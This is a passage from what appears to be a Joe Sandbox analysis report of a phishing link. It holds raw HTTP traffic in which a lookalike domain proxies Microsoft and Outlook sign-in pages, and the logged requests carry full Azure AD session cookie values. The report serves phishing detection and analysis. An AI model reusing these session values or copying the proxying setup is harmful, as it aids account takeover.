esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA
2024-04-26 11:21:17 UTC	1390	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 11:21:17 GMT Content-Type: application/x-javascript content-length: 55071 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Thu, 28 Mar 2024 02:23:53 GMT ETag: 0x8DC4ECE1D0444D4 x-ms-request-id: ac861501-601e-0008-274e-94bd8f000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T112117Z-16f6b7d4654qfkh9g2m5kybc9n00000001qg000000008msv x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2024-04-26 11:21:17 UTC	10	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 Data Ascii:
2024-04-26 11:21:17 UTC	15789	IN	Data Raw: dd 7d 4d 73 23 47 b2 d8 dd bf 02 8b 75 68 86 4f 3d 10 3e f8 89 11 34 06 01 70 06 4f 24 00 01 e0 50 0a 49 46 34 81 22 d8 4b a0 1b af bb 31 1c 2e 35 8e bd f9 f0 0e be da 37 1f 7c f2 d1 17 df fd 53 36 e2 f9 77 38 3f aa aa ab ba 1b 00 39 d2 d3 ee b3 42 c1 41 77 55 65 65 65 65 65 65 66 65 65 ff e1 66 ed 4f 63 2f f0 5f 8a bd 47 f5 bb 10 bc f4 f7 1e bd 9b 97 de 8f fe cf 7b a1 88 d7 a1 5f c0 df 25 f1 71 15 84 71 f4 fa 83 1b 16 e2 06 be 6a 3c ca 77 f5 c7 4f 8e 37 ab fb ce 22 70 67 62 56 ff 43 e5 d3 6b d9 54 60 d3 a9 bb 58 bc 8c 15 04 27 76 92 df c1 1e 3c 70 b3 c6 1f ca 49 c1 27 ec c6 6b 3c 6a 40 41 69 d9 10 4e 50 9a 36 3c f8 bb 6a 14 8b 4e f0 b2 bc f7 e9 e5 8f c9 30 9c c0 f1 00 f9 97 d5 3d c2 d2 6f 78 2f 2b 00 1f fe 39 d8 73 42 f8 e7 70 cf 71 1b 61 69 14 87 9e 3f Data Ascii: }Ms#GuhO=>4pO$PIF4"K1.57\|S6w8?9BAwUeeeeeefeefOc/_G{_%qqj<wO7"pgbVCkT`X'v<pI'k<j@AiNP6<jN0=ox/+9sBpqai?

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:31 UTC	2755	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://r6duftx9uh6.scrdata-doc.cfd/?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ&sso_reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA
2024-04-26 11:21:33 UTC	1392	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 11:21:32 GMT Content-Type: application/x-javascript content-length: 109863 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Thu, 26 Jan 2023 00:32:54 GMT ETag: 0x8DAFF34DD9DC630 x-ms-request-id: 3aeb44c5-a01e-007c-53cb-97e387000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T112132Z-16f6b7d46548xgq5mfvs194cx800000002vg00000000a54r x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_MISS Accept-Ranges: bytes Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2024-04-26 11:21:33 UTC	14992	IN	Data Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6b 7b db c8 91 30 fa 7d 7f 05 c5 93 68 00 13 a4 48 ea 6a 92 10 d7 e3 f1 64 bd c7 63 fb b5 3d d9 37 af cc f8 81 c8 a6 84 31 04 30 b8 d8 56 44 ee 6f 3f 55 d5 77 a0 49 c9 1e 27 9b 73 4e 9e 8c 45 34 1a 7d a9 ae ae ae aa ae cb c1 a3 bd 7f 6b 3d 6a 75 1f fe bf d6 db 77 4f de bc 6b bd fa b9 f5 ee 3f 9e bf f9 a9 f5 1a 9e fe d2 7a f9 ea dd f3 a7 cf 1e de 0e 76 8a ff bd bb 8e 8b d6 32 4e 58 0b fe 5e 46 05 5b b4 b2 b4 95 e5 ad 38 9d 67 f9 2a cb a3 92 15 ad 1b f8 37 8f a3 a4 b5 cc b3 9b 56 79 cd 5a ab 3c fb 8d cd cb a2 95 c4 45 09 1f 5d b2 24 fb dc f2 a0 b9 7c d1 7a 1d e5 e5 6d eb f9 6b bf 07 ed 33 68 2d be 8a 53 f8 7a 9e ad 6e e1 f7 75 d9 4a b3 32 9e b3 56 94 2e a8 b5 04 1e d2 82 b5 aa 74 c1 f2 d6 e7 eb 78 7e dd fa 25 9e e7 59 91 Data Ascii: k{0}hHjdc=710VDo?UwI'sNE4}k=juwOk?zv2NX^F[8g*7VyZ<E]$\|zmk3h-SznuJ2V.tx~%Y
2024-04-26 11:21:33 UTC	1392	IN	Data Raw: 72 6b 95 a9 2b 79 ec f3 c8 d9 e7 d9 7a 78 d4 0f a8 77 d9 a9 7b 00 ca 16 4d 63 eb 5f 0c 4c cf 01 a3 b5 83 5d cd d6 d3 73 7a 32 c0 26 c8 e3 9b 29 ff e3 f9 e4 9e 2b 72 16 fc f5 7d d1 59 c3 7f 7f e0 69 0b 36 68 6a 2f 5f fe 44 99 1d ea 3e c1 22 b6 c1 58 6e 0e 32 31 06 09 af 13 b6 c3 b6 19 8a c7 74 f8 fb bb 3e 7d 8c 8b 6d 20 fc 48 83 3d 38 ff ce 43 1d e0 26 33 1c dc e9 ac 2c e9 84 24 af 02 6d 4b b1 f1 8d e4 b3 a9 07 6b ee 63 10 b7 c3 46 10 b7 b2 c7 13 2c fe 12 ad fe c4 83 02 66 3c ae fe 91 ef 78 13 18 d5 9f 66 69 81 a1 ab 29 9e da 99 df 7c a1 2a bf c4 ac a2 18 77 7b e0 1b 25 38 9e a3 2d a9 8c 71 00 c7 3c 68 db 71 5f 04 6d 3b 3e 39 f1 7b b4 ae 6f 59 09 84 06 bb 3d f5 7b d0 e1 0a 08 d8 8b b8 28 6b 61 bc 39 29 c7 a0 ce 44 e6 3f 50 4a dd 0c d3 fd 3e c9 31 50 46 1b Data Ascii: rk+yzxw{Mc_L]sz2&)+r}Yi6hj/_D>"Xn21t>}m H=8C&3,$mKkcF,f<xfi)\|*w{%8-q<hq_m;>9{oY={(ka9)D?PJ>1PF
2024-04-26 11:21:33 UTC	9510	IN	Data Raw: 23 30 22 75 c1 a1 5b a0 67 5c a3 58 32 27 9a 62 c7 a1 cd 04 4a 6f 34 45 70 03 b3 9f b8 bb 44 67 b9 38 b0 3b 37 09 72 77 d0 9d 93 c7 5d ad 74 cb 27 62 b8 95 4f e1 cc ec 52 35 5a 41 ba 85 ae 58 30 9c 7a a4 44 c9 ad f6 53 1e c9 0b d9 b1 eb 4e c8 a4 8e e4 ba 86 5b 12 3a 6f 2d f6 c5 6d f2 c4 30 68 7d 23 11 e4 9e 9b 3f 92 16 d1 30 7e c9 4a 72 85 b5 29 df 30 5f 1a eb d9 6c 18 53 82 a5 60 c4 f4 88 e1 a4 79 f5 39 95 31 36 4c f7 9f da 08 80 a3 9a ba 59 be 74 46 4c b3 9b cc 37 3d 92 b8 1f ee 9d 10 a3 05 97 29 9e c4 3e 2e 6c de d3 d8 56 b4 50 23 73 d1 f4 3b b9 0b e5 c7 f5 6d ee f9 9b b1 01 46 c9 8c 23 77 85 a0 24 36 cb 28 53 7c 77 93 65 37 c5 fa c6 fb 2d 3c b6 f1 99 42 0b 5e d1 8d 33 ba 76 60 76 87 62 70 1d c2 5b b3 43 d5 28 26 75 c7 17 04 33 de 04 4e c5 54 84 4a a3 Data Ascii: #0"u[g\X2'bJo4EpDg8;7rw]t'bOR5ZAX0zDSN[:o-m0h}#?0~Jr)0_lS`y916LYtFL7=)>.lVP#s;mF#w$6(S\|we7-<B^3v`vbp[C(&u3NTJ
2024-04-26 11:21:33 UTC	6289	IN	Data Raw: cd 3d fb 73 db 36 d2 bf 7f 7f 85 cd 7a 1c 22 82 9f 79 34 21 c3 ea 1c 57 ed b4 13 c7 19 ab b9 cc 8d ac 78 68 99 b2 d9 c8 62 4a 52 76 12 4b f7 b7 df 3e 00 10 20 29 c5 c9 f5 66 be 1f 6c 52 20 9e 8b c5 02 fb c0 2e 05 2d d7 3f 0a ce 04 a9 97 98 f7 e2 02 bd 76 20 51 a7 df 80 eb 09 bf 8c c7 f4 64 d7 ed 4e 1e 4e 3a 98 4c 74 6a 41 c9 c9 75 5a d2 8b 62 c3 9c 32 2a ed 18 aa 77 d2 27 a6 8a a6 1a 75 30 c4 8e aa d8 64 91 cb 00 d7 48 ac 0a 8a a2 33 6b 9d a4 b9 b1 4f 56 31 db a3 db 8b a6 08 cb 43 4f cb f0 ed ea 22 cd ef d7 08 65 5d d2 c4 ec 3a 2e 3e b4 c8 c9 76 49 58 f9 55 a7 91 2b 02 7d d4 d7 fb 20 19 aa f5 1a e2 3b e6 6f f3 9f 87 2a a6 6c 02 67 2d f5 02 db 6e 3e 75 7f 99 e8 27 39 ee 85 4b e3 9d 3c 7f fc 37 45 45 82 dd 97 82 df 3c 7d fe e4 6b e1 3c ed 9d b9 4d 0b de a6 Data Ascii: =s6z"y4!WxhbJRvK> )flR .-?v QdNN:LtjAuZb2w'u0dH3kOV1CO"e]:.>vIXU+} ;olg-n>u'9K<7EE<}k<M

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:33 UTC	712	OUT	GET /owa/prefetch.aspx HTTP/1.1 Host: outlook.office365.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://r6duftx9uh6.scrdata-doc.cfd/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 11:21:33 UTC	1905	IN	HTTP/1.1 200 OK Cache-Control: private, no-store Content-Length: 2745 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 request-id: c870e184-b1d2-727f-5d2f-017cbfc36298 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-CalculatedFETarget: BL1PR13CU012.internal.outlook.com X-BackEndHttpStatus: 200 Set-Cookie: ClientId=7A5796A74B4F4077821AC5A4864DA729; expires=Sat, 26-Apr-2025 11:21:33 GMT; path=/;SameSite=None; secure Set-Cookie: ClientId=7A5796A74B4F4077821AC5A4864DA729; expires=Sat, 26-Apr-2025 11:21:33 GMT; path=/;SameSite=None; secure Set-Cookie: OIDC=1; expires=Sat, 26-Oct-2024 11:21:33 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: OWAPF=v:15.20.7472.44&l:mouse; path=/; secure; HttpOnly X-CalculatedBETarget: MN0PR16MB6473.namprd16.PROD.OUTLOOK.COM X-BackEndHttpStatus: 200 X-RUM-Validated: 1 X-RUM-NotUpdateQueriedPath: 1 X-RUM-NotUpdateQueriedDbCopy: 1 X-Content-Type-Options: nosniff X-BeSku: WCS8 X-OWA-Version: 15.20.7472.44 X-OWA-DiagnosticsInfo: 1;0;0 X-IIDs: 0 X-BackEnd-Begin: 2024-04-26T11:21:33.526 X-BackEnd-End: 2024-04-26T11:21:33.526 X-DiagInfo: MN0PR16MB6473 X-BEServer: MN0PR16MB6473 X-UA-Compatible: IE=EmulateIE7 X-Proxy-RoutingCorrectness: 1 X-Proxy-BackendServerStatus: 200 X-FEProxyInfo: BN8PR16CA0004.NAMPRD16.PROD.OUTLOOK.COM X-FEEFZInfo: LYH X-FEServer: BL1PR13CA0350 Report-To: {"group":"NelOfficeUpload1","max_age":7200,"endpoints":[{"url":"https://exo.nel.measure.office.net/api/report?TenantId=&FrontEnd=Cafe&DestinationEndpoint=LYH&RemoteIP=102.129.152.220"}],"include_subdomains":true} NEL: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01} X-FirstHopCafeEFZ: LYH X-FEServer: BN8PR16CA0004 Date: Fri, 26 Apr 2024 11:21:33 GMT Connection: close
2024-04-26 11:21:33 UTC	2745	IN	Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 72 65 66 65 74 63 68 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0d 0a 0d 0a 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 6f 66 66 69 63 65 33 36 35 69 63 6f 6e 73 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3a 20 75 72 6c 28 27 68 74 74 70 73 3a 2f Data Ascii: <!DOCTYPE html><html><head> <title>Prefetch</title> <meta http-equiv="x-ua-compatible" content="IE=Edge"> <style> @font-face { font-family: 'office365icons'; src: url('https:/

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://click.pstmrk.it/3s/t.co%2FRieqFTtqmt/gMTC/7_W0AQ/AQ/880c85de-cc11-4181-9f68-0f08d9f1e222/1/rCUNy3Yffz

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 115

Chrome Cache Entry: 116

Chrome Cache Entry: 117

Chrome Cache Entry: 118

Windows Analysis Report
https://click.pstmrk.it/3s/t.co%2FRieqFTtqmt/gMTC/7_W0AQ/AQ/880c85de-cc11-4181-9f68-0f08d9f1e222/1/rCUNy3Yffz

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:34 UTC	2818	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/images/appbackgrounds/49-small_e58aafc980614a9cd7796bea7b5ea8f0.jpg HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://r6duftx9uh6.scrdata-doc.cfd/?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ&sso_reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA; brcap=0
2024-04-26 11:21:35 UTC	741	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 11:21:35 GMT Content-Type: image/jpeg Content-Length: 987 Connection: close Cache-Control: public, max-age=31536000 Last-Modified: Fri, 27 Mar 2020 19:41:47 GMT ETag: 0x8D7D286E322A911 x-ms-request-id: 77152afa-e01e-0068-3dcb-97ffad000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T112134Z-16f6b7d4654qfkh9g2m5kybc9n00000001p000000000cm8x x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-04-26 11:21:35 UTC	987	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 66 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 04 01 1a 00 05 00 00 00 01 00 00 00 3e 01 1b 00 05 00 00 00 01 00 00 00 46 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 10 00 00 00 4e 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 70 61 69 6e 74 2e 6e 65 74 20 34 2e 32 2e 39 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii: JFIFHHfExifMM*>F(1NHHpaint.net 4.2.9CC

Timestamp	Bytes transferred	Direction	Data
